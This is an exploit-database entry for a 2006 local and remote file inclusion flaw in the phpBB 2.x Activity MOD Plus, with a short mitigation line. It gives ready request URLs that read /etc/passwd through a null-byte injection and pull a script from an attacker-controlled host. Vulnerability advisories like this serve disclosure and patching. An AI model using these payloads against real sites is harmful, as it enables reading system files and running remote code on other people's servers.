header-logo
Suggest Exploit
vendor:
phpBB
by:
nukedx.com
7.5
CVSS
HIGH
File Inclusion Vulnerability
98
CWE
Product Name: phpBB
Affected Version From: phpBB 2.x
Affected Version To: phpBB 2.x
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

phpBB 2.x (Activity MOD Plus) File Inclusion Vulnerability

This exploits works on phpBB 2.x (Activity MOD Plus). Succesful exploitation needs register_globals on GET -> http://[victim]/[phpBB]/language/lang_english/lang_activity.php?phpbb_root_path=[FILE]. Requires magic_quotes_gpc off EXAMPLE -> http://[victim]/[phpBB]/language/lang_english/lang_activity.php?phpbb_root_path=http://yoursite.com/script.txt. Requires allow_url_fopen on.

Mitigation:

Ensure that register_globals, magic_quotes_gpc and allow_url_fopen are disabled.
Source

Exploit-DB raw data:

phpBB 2.x (Activity MOD Plus) File Inclusion Vulnerability
Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
This exploits works on phpBB 2.x (Activity MOD Plus)
Original advisory can be found at: http://www.nukedx.com/?viewdoc=38

Succesful exploitation needs register_globals on
GET -> http://[victim]/[phpBB]/language/lang_english/lang_activity.php?phpbb_root_path=[FILE]
EXAMPLE -> http://[victim]/[phpBB]/language/lang_english/lang_activity.php?phpbb_root_path=/etc/passwd%00
Requires magic_quotes_gpc off
EXAMPLE -> http://[victim]/[phpBB]/language/lang_english/lang_activity.php?phpbb_root_path=http://yoursite.com/script.txt
Requires allow_url_fopen on

# nukedx.com [2006-05-27]

# milw0rm.com [2006-05-28]